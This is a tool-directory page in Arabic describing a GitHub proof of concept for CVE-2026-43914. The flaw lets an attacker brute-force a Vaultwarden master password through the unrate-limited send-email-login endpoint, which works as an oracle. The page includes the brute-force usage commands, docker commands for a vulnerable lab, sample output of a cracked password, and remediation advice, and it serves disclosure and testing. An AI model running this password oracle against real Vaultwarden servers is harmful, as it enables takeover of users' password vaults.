Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43914-PoC — PoC لثغرة CVE-2026-43914: Vaultwarden <1.35.4 — oracle لكلمة المرور لتجاوز القوة الغاشمة للتحقق بخطوتين عبر البريد الإلكتروني (email-2FA). Python باستخدام المكتبة القياسية فقط (Stdlib-only). | Kitploit
أدوات/GitHubGitHub/boreas37/cve-2026-43914-poc
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubboreas37/cve-2026-43914-poc

CVE-2026-43914-PoC

PoC لثغرة CVE-2026-43914: Vaultwarden <1.35.4 — oracle لكلمة المرور لتجاوز القوة الغاشمة للتحقق بخطوتين عبر البريد الإلكتروني (email-2FA). Python باستخدام المكتبة القياسية فقط (Stdlib-only).

عرض المستودع
2منذ 0 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-43914 — تجاوز حماية القوة الغاشمة للمصادقة الثنائية عبر البريد الإلكتروني في Vaultwarden

إثبات مفهوم لـ CVE-2026-43914: عند تفعيل المصادقة الثنائية عبر البريد الإلكتروني (Email 2FA)، يمكن تجاوز حماية القوة الغاشمة لتسجيل الدخول في Vaultwarden بالكامل عبر نقطة النهاية غير الموثّقة POST /api/two-factor/send-email-login، والتي تعمل كـ أوراكل غير محدودة لكلمة المرور الرئيسية.

الإصدارات المتأثرة: Vaultwarden < 1.35.4

لماذا يهم هذا الأمر

Vaultwarden هو مدير كلمات المرور الأكثر شيوعًا المتوافق مع Bitwarden والمستضاف ذاتيًا. يقوم المسؤولون بتفعيل المصادقة الثنائية عبر البريد الإلكتروني ظنًا منهم أنها تمنع تخمين كلمات المرور — ولكن هذه النقطة تتحقق من تجزئة كلمة المرور الرئيسية وتُعيد حالة HTTP مميزة للتخمينات الصحيحة/الخاطئة قبل تطبيق أي تحديد لمعدل الطلبات أو قفل للحساب:

الاستجابةالمعنى
200كلمة المرور صحيحة (تم إرسال رمز OTP بالبريد الإلكتروني)
400 "اسم المستخدم أو كلمة المرور غير صحيحة"كلمة المرور خاطئة

يمكن لمهاجم يعرف (أو يخمّن) البريد الإلكتروني للضحية تخمين كلمة المرور الرئيسية بأقصى سرعة وبدون أي تقييد للمعدل. المصادقة الثنائية عبر البريد الإلكتروني لا تمنع ذلك.

السبب الجذري (من المصدر، v1.35.3)

في src/api/core/two-factor/email.rs، يتحقق معالج send_email_login من كلمة المرور ويعيد النتيجة مبكرًا عند عدم التطابق — ولكن هذا المسار غير مسجّل مع البرمجيات الوسيطة الخاصة بمكافحة القوة الغاشمة/تحديد الطلبات التي تحمي /identity/connect/token. كل استدعاء:

  1. يبحث عن المستخدم عبر البريد الإلكتروني،
  2. يقارن check_valid_password(master_password_hash) → err!("Username or password is incorrect") (HTTP 400) عند عدم التطابق،
  3. عند النجاح، يُنشئ رمز OTP ويرسله عبر البريد الإلكتروني ويعيد HTTP 200.

الاستخدام

root@kitploit:~
python3 vw_bf_poc.py --host localhost --port 8222 \
    --email [email protected] \
    --passwords "summer2024,Qwerty123!,CorrectHorse123!"

# or a wordlist:
python3 vw_bf_poc.py --email [email protected] --wordlist rockyou-top1000.txt

يكفي استخدام مكتبة Python 3 القياسية فقط.

المعمل (لإعادة الإنتاج)

root@kitploit:~
# mail catcher
docker run -d --name mailhog -p 11025:1025 -p 18025:8025 mailhog/mailhog

# vulnerable Vaultwarden (< 1.35.4), SMTP -> MailHog
docker run -d --name vw-lab -p 8222:80 --link mailhog \
  -e I_REALLY_WANT_VOLATILE_STORAGE=true \
  -e SMTP_HOST=mailhog -e SMTP_PORT=1025 -e SMTP_SECURITY=off \
  -e [email protected] -e DOMAIN=http://localhost:8222 \
  vaultwarden/server:1.35.3

أنشئ مستخدمًا تجريبيًا (عبر أي عميل أو API من Bitwarden)، وفعّل المصادقة الثنائية عبر البريد الإلكتروني (الإعدادات ← تسجيل الدخول بخطوتين ← البريد الإلكتروني)، ثم شغّل الأداة ضده.

المخرجات الموثّقة

root@kitploit:~
$ python3 vw_bf_poc.py --email [email protected] --passwords "wrong1,wrong2,CorrectHorse123!"
[*] Target : localhost:8222
[*] Victim : [email protected]
[*] Trying 3 candidate passwords via send-email-login oracle

  [0001] 400  -  wrong1
  [0002] 400  -  wrong2
  [0003] 200  HIT!  CorrectHorse123!

=> PASS: master password FOUND = 'CorrectHorse123!'  (1.4s, no rate limit hit)

الإصلاح

قم بترقية Vaultwarden إلى 1.35.4+. وإلى ذلك الحين: عطّل المصادقة الثنائية عبر البريد الإلكتروني لصالح TOTP/WebAuthn، وضع المثيل خلف وكيل عكسي مع تحديد معدل الطلبات لكل عنوان IP على /api/two-factor/*.

المراجع

  • GHSA-c5rv-q295-7w4g (نشرة أمنية من dani-garcia/vaultwarden)
  • نشرة Neodyme الأمنية: cve-2026-43914

إخلاء المسؤولية

للاستخدام المصرح به في الأبحاث الأمنية والأغراض المخبرية فقط.

تنزيل الأداة